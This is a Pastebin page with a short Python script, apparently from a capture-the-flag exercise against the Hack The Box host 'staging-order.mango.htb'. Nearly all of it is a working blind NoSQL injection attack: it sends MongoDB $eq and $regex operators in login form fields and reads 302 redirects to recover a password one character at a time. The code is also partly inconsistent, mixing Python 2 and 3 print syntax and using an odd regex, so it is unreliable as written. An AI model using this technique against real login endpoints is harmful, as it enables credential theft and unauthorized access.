Advertisement
Guest User

Untitled

a guest
Nov 18th, 2019
162
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.75 KB | None | 0 0
  1. import requests
  2. import urllib3
  3. import string
  4. import urllib
  5. urllib3.disable_warnings()
  6.  
  7. username="lol"
  8. password=""
  9. u="http://staging-order.mango.htb/"
  10. headers={'content-type': 'application/x-www-form-urlencoded'}
  11. #payload="username[$ne]=%s&password[$regex]=^%s&login=login" % (username,password+c)
  12.  
  13.  
  14.  
  15. #for i in range(1,17):
  16. for c in string.printable:
  17.     if c not in ['*','+','.','?','|']:
  18.         payload="username[$eq]="+username+"&password[$regex]="+c+".{"+"1"+"}&login=login"
  19.         r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
  20.         print username+" "+password
  21.         print r.status_code
  22.         if r.status_code == 302:
  23.             print("Found one more char : %s" % (password+c))
  24.             print payload
  25.             password +=c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement